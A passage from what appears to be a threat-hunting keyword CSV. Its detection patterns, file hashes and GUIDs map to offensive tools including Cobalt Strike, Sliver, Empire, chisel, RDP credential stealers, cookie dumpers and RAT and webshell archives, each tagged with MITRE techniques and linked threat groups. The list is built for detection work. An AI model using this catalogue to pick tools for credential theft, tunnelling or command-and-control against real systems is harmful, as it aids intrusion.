Escalation","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#GUIDproject","N/A","10","10","N/A","N/A","N/A","N/A","35408" "*bbfc6050331bf5adc5739601417028779f7d971915cf97d7052b9d2f55e06302*",".{0,1000}bbfc6050331bf5adc5739601417028779f7d971915cf97d7052b9d2f55e06302.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35409" "*bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5*",".{0,1000}bbfe2aee2092d981bd2822b8fde8db0ed264f0f86ed445d8987d99b505fd0ff5.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","#filehash","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","35410" "*bblockdlls*",".{0,1000}bblockdlls.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35412" "*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35413" "*bbrowserpivot*",".{0,1000}bbrowserpivot.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35414" "*bbtfr/evil-proxy*",".{0,1000}bbtfr\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","35415" "*bbypassuac*",".{0,1000}bbypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin 
- Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35416" "*bc01c98fcd3e3bcf836254ba2ea39813c9129c342a609fc8c9dfc59b94f0a2f6*",".{0,1000}bc01c98fcd3e3bcf836254ba2ea39813c9129c342a609fc8c9dfc59b94f0a2f6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35417" "*bc039376443ab3eebc8b1f876e47c19fc2cd74a9417f7c8cb75d5b0c090f87d7*",".{0,1000}bc039376443ab3eebc8b1f876e47c19fc2cd74a9417f7c8cb75d5b0c090f87d7.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35418" "*bc051b7ae14e30935c4cc0090a944f420fa69cbcf66469038af5a306030b9007*",".{0,1000}bc051b7ae14e30935c4cc0090a944f420fa69cbcf66469038af5a306030b9007.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","35420" "*bc0ede720752c8c47e5ae348c16efd9c52668f6267f1118e3f5af0ee22741beb*",".{0,1000}bc0ede720752c8c47e5ae348c16efd9c52668f6267f1118e3f5af0ee22741beb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35421" "*bc0ff8a55724a6ac40a71ca1b0072e40c34e80c13c26688860fdf3c4e5309f25*",".{0,1000}bc0ff8a55724a6ac40a71ca1b0072e40c34e80c13c26688860fdf3c4e5309f25.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","35422" "*bc10e4d6dd01c0d941795e6084bac19a8ce38c5b581523845a748e56579cce00*",".{0,1000}bc10e4d6dd01c0d941795e6084bac19a8ce38c5b581523845a748e56579cce00.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","35423" "*bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e*",".{0,1000}bc11b2b14526fef7b745fa22f0359235fab202060716f0c9544e4ef899c7312e.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential 
Access","https://github.com/byinarie/teams_dump","1","0","#filehash","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","35424" "*bc160ae1d1dbef0c815e3ed63f873b3e753e4d5e950af24c76b08fef5be4c7b4*",".{0,1000}bc160ae1d1dbef0c815e3ed63f873b3e753e4d5e950af24c76b08fef5be4c7b4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","35425" "*bc1d04a56e801f0a7a5e3488f930a485e8c63eafa80e89444ff63ac81f5a90cb*",".{0,1000}bc1d04a56e801f0a7a5e3488f930a485e8c63eafa80e89444ff63ac81f5a90cb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35427" "*bc2502f347b077bc5d332192e25a696c072314503ad10b6573c483fd61f9d4cb*",".{0,1000}bc2502f347b077bc5d332192e25a696c072314503ad10b6573c483fd61f9d4cb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35428" 
"*bc25b38d07d2dbc8c7d9491a0779dcfaf87ea69ce078900ed61d307f45da33c3*",".{0,1000}bc25b38d07d2dbc8c7d9491a0779dcfaf87ea69ce078900ed61d307f45da33c3.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#filehash","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","35429" "*bc2a86638dcca2986c5099d1145af207a0e237815b29a9f727e39894c15ef4eb*",".{0,1000}bc2a86638dcca2986c5099d1145af207a0e237815b29a9f727e39894c15ef4eb.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","35431" "*bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed*",".{0,1000}bc2ce508993e19027fb23f837dd48da400898cbc83d9adde6febb803e76817ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35432" "*bc2ef0da409c8c1a026e13d11b4cf32995e4a7e742c097ca9d1594aba8d3d4e3*",".{0,1000}bc2ef0da409c8c1a026e13d11b4cf32995e4a7e742c097ca9d1594aba8d3d4e3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - 
T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","35433" "*bc3023b36063a7681db24681472b54fa11f0d4ec*",".{0,1000}bc3023b36063a7681db24681472b54fa11f0d4ec.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35434" "*bc32ae3ef3f8dc5a7c4b4ce19bc8dddc830e6c59d655d98bf178a4a239bde38b*",".{0,1000}bc32ae3ef3f8dc5a7c4b4ce19bc8dddc830e6c59d655d98bf178a4a239bde38b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - 
T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35435" "*bc379f273189510c10ca5c473ca78ce246ac734ec6a376bdca7e0ddfa09804f7*",".{0,1000}bc379f273189510c10ca5c473ca78ce246ac734ec6a376bdca7e0ddfa09804f7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35437" "*bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a*",".{0,1000}bc422a4e1b6a351ac6fe73d496015cfa6a9dbd5e38566c6f44a59faff83ee95a.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","35439" "*bc4657ac480d1f46349254c1d217dba4725fe54bbfa5fe7492c6a1bf1c6afebe*",".{0,1000}bc4657ac480d1f46349254c1d217dba4725fe54bbfa5fe7492c6a1bf1c6afebe.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","#filehash","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","35441" "*bc511e38827372f9bbfcd48fd448c51c0051f7cb64a91b2b4d0208a4dade3d22*",".{0,1000}bc511e38827372f9bbfcd48fd448c51c0051f7cb64a91b2b4d0208a4dade3d22.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - 
T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","35442" "*bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5*",".{0,1000}bc5d95f4894db18e69826a772226989ca19ea7e63dbb9fa13775836a0b25cdb5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35443" "*bc600d653659564adc9f526dbba502d0b2fa47c82192b0c14fd25f45d81eec6d*",".{0,1000}bc600d653659564adc9f526dbba502d0b2fa47c82192b0c14fd25f45d81eec6d.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","35444" "*bc6e01140eef4c7579635f731aea2b4658c733f25dae67a3f56fee8316151a27*",".{0,1000}bc6e01140eef4c7579635f731aea2b4658c733f25dae67a3f56fee8316151a27.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35446" "*bc6fbafaafa92286c70e56a47a47281e3621dc6a0e606540e9e2ba34db51e21c*",".{0,1000}bc6fbafaafa92286c70e56a47a47281e3621dc6a0e606540e9e2ba34db51e21c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform 
proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35447" "*bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce*",".{0,1000}bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","35448" "*bc737503f81a21c41b39c2ebcf25949d9012af6efa31d1bf305d0cafe46da136*",".{0,1000}bc737503f81a21c41b39c2ebcf25949d9012af6efa31d1bf305d0cafe46da136.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","35449" "*BC74B071-B36A-4EE8-8F03-5CF0A02C32DA*",".{0,1000}BC74B071\-B36A\-4EE8\-8F03\-5CF0A02C32DA.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","35450" "*bc791951b9137e1d891721b95f21d5414e1d792813b976547d3f58a745023797*",".{0,1000}bc791951b9137e1d891721b95f21d5414e1d792813b976547d3f58a745023797.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","35452" "*bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a*",".{0,1000}bc7a70c2b56c5e036a0750ab7c93511235161e84f913f538d5e12882b66d965a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35453" "*bc7f0c671c1035f9af93b7b657005fbc4807deef8071bc58bf310f821cf67944*",".{0,1000}bc7f0c671c1035f9af93b7b657005fbc4807deef8071bc58bf310f821cf67944.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","35455" 
"*bc878fdcd73cf4ee6dd19e0af9d85cae49a96862da17936f079c240e362f2787*",".{0,1000}bc878fdcd73cf4ee6dd19e0af9d85cae49a96862da17936f079c240e362f2787.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35458" "*bc887f2d746cb1605a42773ba27c00865d2ba1e7a3ee091b91cdb7f581b7f7fb*",".{0,1000}bc887f2d746cb1605a42773ba27c00865d2ba1e7a3ee091b91cdb7f581b7f7fb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35460" "*bc991b30cee4be589d540e1d0f055d62072843cbe1b95b27f40b860dc5aef935*",".{0,1000}bc991b30cee4be589d540e1d0f055d62072843cbe1b95b27f40b860dc5aef935.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","35462" 